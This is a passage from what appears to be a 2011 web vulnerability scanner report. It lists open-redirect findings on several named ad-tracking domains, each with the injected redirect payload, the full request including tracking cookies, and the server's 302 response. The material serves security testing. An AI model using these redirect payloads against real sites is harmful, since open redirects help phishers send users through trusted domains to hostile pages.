Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=optout

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:24:22 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Location: http://aaeebcc5cb07bba75/a?http://optout.crwdcntrl.net/optout/check.php?src=naioo
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


14.23. http://pixel.quantserve.com/pixel/p-7bFjjs2q00gK6.gif [redirecturl parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-7bFjjs2q00gK6.gif

Issue detail

The value of the redirecturl request parameter is used to perform an HTTP redirect. The payload .ab7e93de82768ba14/ was submitted in the redirecturl parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /pixel/p-7bFjjs2q00gK6.gif?labels=0%2c852%2c3-1012-0%2c0-0&redirecturl=.ab7e93de82768ba14/ HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4e5e6725-891ad-f8693-5137e; d=EG8BIgHQB4FQCa0Wu-EYIIvxC6pQ

Response

HTTP/1.1 302 Found
Connection: close
Location: http://.ab7e93de82768ba14/
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sun, 04 Sep 2011 03:21:26 GMT
Server: QS


14.24. http://privacy.revsci.net/optout/optoutv.aspx [p parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://privacy.revsci.net
Path:   /optout/optoutv.aspx

Issue detail

The value of the p request parameter is used to perform an HTTP redirect. The payload http%3a//a3120f1e3387f9194/a%3fhttp%3a//www.networkadvertising.org was submitted in the p parameter. This caused a redirection to the following URL:

Request

GET /optout/optoutv.aspx?v=2&p=http%3a//a3120f1e3387f9194/a%3fhttp%3a//www.networkadvertising.org&nocache=0.3816535 HTTP/1.1
Host: privacy.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv38FMJbiprpr4pgtCoa4a5xWExsOFqd64VnOKEYktoA24C/Ef+EZx1Twi0VADHUAlWk1TBjtT/2wnC6cxBIL3UgC39ISGlxvNxpO1oE0PLF3lKZ1eQq53SUKdS/qq/nNz4iZtcnTXD4iJTfaogQ3MSCq8mqbKhgKfOgOhC+Skc/P20cerX3Xtn8x2Tg57iLmhn5VQ0d5f9VPDzx6GAB9kD+rzx8V/IIzOmhoiWkpNqDJYG0rudGFCpEE3z8NZEw/S0otIypuzNuO1GjcG2YfSplGNhzWWAeY58TBvMrLba24vGp4xXT/9NE8rRl7JYWg5dAoMwfBDHBPRiMmUjfmfj5iE2BJ/yJTB8x3Q2uD0ayEAlhbg+55kuVXtrdg5QNiQuFzMMSSg5AB5A5PEfiLGlDe7AS0lHizhvMPwozEUDRRF2Z2Ar3Er7l6nnASLKWLksCGwfnyIj8jdIqZUxgDjxLhFEW86A2Wj1ING+F1tBHwgXAopFzMsNLaOYfjK4Sjm2BxKI58zliylLdXlqhimol4D+LoKuE2SG+NsQrWR9fahC6aB7SHsyUqJL+VIL+SlbiOKCRr/zGS8ri9i10yXQuP+hVzAaDO2XJHZA5r52gi3+c/5nAIDMvZvWL+14BRDbo/fqhY2cENg3zMwC0lpAv8KsUYiRXkDGEdU0N4MyDFW++3rom4Q8TgytGdfG8bldhmHocPcH6QQqLASsZ8Of2g2SGZWGPrV8zujE28C1OH4S5vrTMm/5wrCgJTlflBSmSogRkoIGyA1XMDChko0HCLF8nJakqfhMLV5MS1kbL/tXQX5BvgJR8ACuqio0XBjFb9JKtX0r+bnLUxLHy1TcjLaPSqGy3RZDY5hm1KcEZIrs++s4/ynkigb88vqv00+3C42ZxsKH/Xc3w5BUu1606GbIiD5tiegmwuLRaqVzkeQLaNSoBc4cjaoXuA+HQZN3QnnC6yxyVviBT8jmQVYoTTj4tv417hPYBLsLr16d/Bm2YQxuHd6cZUgMwfs=; rsi_segs_1000000=pUPFecPC7nMQFmLKHV2YkRHDFb4ddJjwAHYhBTtuzLxVqYeIB0dM92NsMncA2vI0bDxRRGXldzihH0IzTP2420rfnAJFmebfJ6fSvpAKtGju2Y3H4gP/EkEw6MsyuSHW/2xtsaZWEFZK/sd90fA29DzLYQ+mnsQwg9YdRKYn1CT2JvnAlnRAy+d8yVT/61iEsA/KMmYUKQl/ikKOeS/20ZueyAwRhbpaBfCideOdViY=; rtc_pDT9=MLsvs6VKcT5nJpHGUMPJYuYyUHdqT6LR5ubEw8DRmRbUsThoweg2YcRkyKTtsHnzuxhOY0svIo4EwvbsI9iWksJEsNye+cO+VgHGU5I2hW/5sJYPREd5O/RVikVLzd1fVDIUkMdnDge2al5lAtMrqZqvX1PQhVdQeeA07d84VZJvRpHiKXxQxpj96Sp819Pc5gIE8o5fzY8E9FhLN79SCKxX5zSKwb+hNOx8oJigjIieMQ+pIUGFPbqI3kFJCs7ckNmHCfg2/pF06ypumLzJhmG843Oo0p9CAO+W8uOWJF7zzF8aGie5IiALrJTDd3bZMCj8AQCRYoYeunfKrl/Kyr2+PSP7As+nEey/smtwluNh3SiAAgvwh3ilNo2CQ7jP8ky61SxOEdIdZFwgrh65bvjxpUjFVvSDu8nmiGjaSNanK8XrObNSbZOAwMcKBq7X4NPBqQ==; rsiPus_ymv_="MLtXrl8utl9roAD3CtgJ/MCFqswSrgQEEn5bOqftJtmLJM2JICAiAWoJ5Yu9t3o3dNI8YWdfjMovFAR/OZkpwpGNH1PYq9aujcCUJDf2RXbI06MnSt3p6UHAdBI9wM957Uo//6a6z6+lB+zj1YJH7Dqtxt8mIa9AcCG1YeF3e3fPbB2Xmo9mF1xKIsh1dXJeLZtjCZGHKJmUQzbomPNQZCnZcSEKFuBq/GePBRhQDIBYNt08QI07hfnOhRpDPs/xOSe38X5StA4wff7R4FFAg4ZLi316j3yILYrcop4d+isR0dMNEPscF1jOO5uMkT7Zi2EAiSMj"; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2ZL1poyhgAWP5Eo4e070H87Tzw09roY7rZdAWjngdRmX/KB7PAAOyjiwYeh7miSD9WVLs6TEH5yFeQMoXR7TX5IGiGS1ndQrB+MUwUCLY9LCtG1RUIO8T4vZ7TVwpd5UYsttQEEGDrZMobaomRjlr/jOhiOCcTQ9xQb9+ZxLwz0+XUu5YIKhOmjxiMJpwZRR2dIELXMjyf29sb7qjSf1Cix1HEHGuFpdUeIBuWDX/LHHt2MiG9lc0z1DeVzP0JmoTLjwwgU8QnYjXZP5h7MLvOvy5Hymf/1o0ysHCfLP/hOTb27GJKboToNs+qLeJdi/prBMgyzz98mazXxKguLHx0T6OeIB0PFPL6wACVYR6Ss2TVPNWnEuLhdKUBnQHQD8t0djP5BPGHOXR8OLftKDBRxmzGctcKoQOzTlSEDxC80OuWqDdPJHqjRSjgTGt+4RCu7tIz3Lg+9m0WFADgAMwUuCcKxsNJVcSXrmpttM1kVFohWmbAhJyoJMnsd3Bi86iEN0j8kjNF2ZYuvko2nx2Z4sOKKMCmfUT7V/7NRkPPlGNNxlyTn0WoXHoJSGYBllHj6qOSoPVRfiR+b8bcEwaolUKPwotA1Dwps6Z+UFnBwp59XoXSsqM7I/VqpXmvrUdXX/QRWAvo8riXgIu14uzn2Dsizmta9r0eTSn90Szvh5JZONR+QJDh6/TgEWiKAe9//gYZ3Y/wDkkP7wA5d+GLp0fc7Dkt3R16oEsZlK68W7P3GU2X1eitDFg/FxxQBgbyA8Hxqyan5DuymrD8OpRMtI5zglPp8dxSbbwq3txcUmfTAAs5v255PBJekiQOY/qhYL40pS+qFZSnBeiC4mbirYXmLou2NCIgl80u+Xyf5s="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Location: http://a3120f1e3387f9194/a?http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 0
Date: Sun, 04 Sep 2011 11:00:30 GMT


14.25. http://r.pixel.trafficmp.com/a/bpix [r parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://r.pixel.trafficmp.com
Path:   /a/bpix

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//a94f67f167e950128/a%3f was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /a/bpix?adv=1330&id=6&format=image&r=http%3a//a94f67f167e950128/a%3f HTTP/1.1
Host: r.pixel.trafficmp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: rth=2-lpay4l-44~1nwul~1~1-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-; uid2=499d34e38-cf7e-49f0-bcb0-ea11d282884d-gquw3zmv; T_efdn=44%3A1nwul%3A1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: T_efdn=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l7bw=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_czb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8gs2=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bqam=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3rau=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6qhy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_b8sx=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5umw=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1bn2=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_js7y=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1tob=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_hzah=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_28m1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_aj8e=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gihm=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3ekh=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1dmb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7aea=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_c41g=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9ka8=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_60bq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dl8z=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l1ad=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6jdq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_flbd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ajf5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3c6x=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8fp4=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_58g6=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9gqi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_kudn=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g49e=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jis8=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3bi7=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bnu6=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8a71=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_2de2=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_brfn=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9o6d=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5wgg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6wxg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5p8u=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_btnn=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_j2ry=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6r14=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8tit=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_41o0=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1kd8=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_fl3r=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_eifu=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_htw=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bleb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l7hj=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_hir1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8dlu=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_hxpt=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_2ged=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_anbi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3du=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_fbkt=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ee1y=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1u99=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jvg3=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6vyt=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_hl4f=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3n3z=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_apu9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_79nh=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_iaan=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_js6d=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cqpf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7y91=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ed26=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cfu9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_lrv=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9lcl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g624=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jiv1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: T_6m1z=ltp%3A1oedi%3A1; Domain=trafficmp.com; Expires=Mon, 03-Sep-2012 04:01:15 GMT; Path=/
Set-Cookie: rth=2-lpay4l-ltp~1oedi~1~1-44~1nwul~1~1-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-; Domain=trafficmp.com; Expires=Mon, 03-Sep-2012 04:01:15 GMT; Path=/
Location: http://a94f67f167e950128/a?
Content-Length: 0
Date: Sun, 04 Sep 2011 04:01:14 GMT


14.26. http://s.ixiaa.com/digi/74FD3F27-87A5-4623-80C8-AB4ED16EB84F/a.gif [redirect parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://s.ixiaa.com
Path:   /digi/74FD3F27-87A5-4623-80C8-AB4ED16EB84F/a.gif

Issue detail

The value of the redirect request parameter is used to perform an HTTP redirect. The payload http%3a//a7f5b158891ac82fa/a%3fhttp%3a//msite.martiniadnetwork.com/data/index/ds/ixi/absid/21051315103139790868608/segments/AA%3d{AA_value},AB%3d{AB_value},AC%3d{AC_value},AY%3d{AY_value},AZ%3d{AZ_value},EA%3d{EA_value},EB%3d{EB_value},EC%3d{EC_value},ED%3d{ED_value},EE%3d{EE_value}/ was submitted in the redirect parameter. This caused a redirection to the following URL:

Request

GET /digi/74FD3F27-87A5-4623-80C8-AB4ED16EB84F/a.gif?redirect=http%3a//a7f5b158891ac82fa/a%3fhttp%3a//msite.martiniadnetwork.com/data/index/ds/ixi/absid/21051315103139790868608/segments/AA%3d{AA_value},AB%3d{AB_value},AC%3d{AC_value},AY%3d{AY_value},AZ%3d{AZ_value},EA%3d{EA_value},EB%3d{EB_value},EC%3d{EC_value},ED%3d{ED_value},EE%3d{EE_value}/ HTTP/1.1
Host: s.ixiaa.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 04 Sep 2011 02:38:26 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Location: http://a7f5b158891ac82fa/a?http://msite.martiniadnetwork.com/data/index/ds/ixi/absid/21051315103139790868608/segments/AA=NA,AB=NA,AC=NA,AY=NA,AZ=NA,EA=NA,EB=NA,EC=NA,ED=NA,EE=NA/
X-ClientIP: 50.23.123.106
Content-Length: 0


14.27. http://s.ixiaa.com/digi/DE1758AD-D3EC-426B-A4FB-71459A973A0C/a.gif [redirect parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://s.ixiaa.com
Path:   /digi/DE1758AD-D3EC-426B-A4FB-71459A973A0C/a.gif

Issue detail

The value of the redirect request parameter is used to perform an HTTP redirect. The payload http%3a//a5e350c60d4917138/a%3fhttp%3a//uav.tidaltv.com/3PDPHandler.aspx%3ftpdp%3d16%26ED%3d{ED_value}%26EE%3d{EE_value}%26EB%3d{EB_value}%26EA%3d{EA_value}%26EC%3d{EC_value}%26AC%3d{AC_value} was submitted in the redirect parameter. This caused a redirection to the following URL:

Request

GET /digi/DE1758AD-D3EC-426B-A4FB-71459A973A0C/a.gif?redirect=http%3a//a5e350c60d4917138/a%3fhttp%3a//uav.tidaltv.com/3PDPHandler.aspx%3ftpdp%3d16%26ED%3d{ED_value}%26EE%3d{EE_value}%26EB%3d{EB_value}%26EA%3d{EA_value}%26EC%3d{EC_value}%26AC%3d{AC_value} HTTP/1.1
Host: s.ixiaa.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 04 Sep 2011 03:26:07 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Location: http://a5e350c60d4917138/a?http://uav.tidaltv.com/3PDPHandler.aspx?tpdp=16&ED=NA&EE=NA&EB=NA&EA=NA&EC=NA&AC=NA
X-ClientIP: 50.23.123.106
Content-Length: 0


14.28. http://sync.mathtag.com/sync/img [redir parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The value of the redir request parameter is used to perform an HTTP redirect. The payload http%3a//a1e5704f1cf5ebf04/a%3fhttp%3a//r.casalemedia.com/rum%3fcm_dsp_id%3d3%26external_user_id%3d[MM_UUID] was submitted in the redir parameter. This caused a redirection to the following URL:

Request

GET /sync/img?mt_exid=15&redir=http%3a//a1e5704f1cf5ebf04/a%3fhttp%3a//r.casalemedia.com/rum%3fcm_dsp_id%3d3%26external_user_id%3d[MM_UUID] HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4e62cac5-3093-5789-301b-6f4e7fbf3921; ts=1315097287

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x681b 26651
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 02:41:13 GMT
Location: http://a1e5704f1cf5ebf04/a?http://r.casalemedia.com/rum?cm_dsp_id=3&external_user_id=4e62e4fb-75f1-2a8b-6a3a-c1b9a7ab40f4
Connection: Keep-Alive
Set-Cookie: ts=1315104073; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 02:41:13 GMT
Content-Length: 0


14.29. http://t.mookie1.com/t/v1/event [migDest parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /t/v1/event

Issue detail

The value of the migDest request parameter is used to perform an HTTP redirect. The payload http%3a//ac8bb3451f1e18343/a%3fhttp%3a//uav.tidaltv.com/3PDPHandler.aspx%3ftpdp%3d25%26app%3d3%26segs%3d was submitted in the migDest parameter. This caused a redirection to the following URL:

Request

GET /t/v1/event?migClientId=2451&migAction=ibehavior_tidal&migSource=mig&migDest=http%3a//ac8bb3451f1e18343/a%3fhttp%3a//uav.tidaltv.com/3PDPHandler.aspx%3ftpdp%3d25%26app%3d3%26segs%3d&vid=0 HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; id=4612741554684080402; mdata=1|4612741554684080402|1315103146

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 03:24:14 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914807826538115; path=/; expires=Wed, 03-Oct-12 03:24:14 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=1|914807826538115|1315106598; path=/; expires=Wed, 03-Oct-12 03:24:14 GMT; path=/; domain=.mookie1.com
Location: http://ac8bb3451f1e18343/a?http://uav.tidaltv.com/3PDPHandler.aspx?tpdp=25&app=3&segs=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.30. http://t4.liverail.com/ [redirect parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://t4.liverail.com
Path:   /

Issue detail

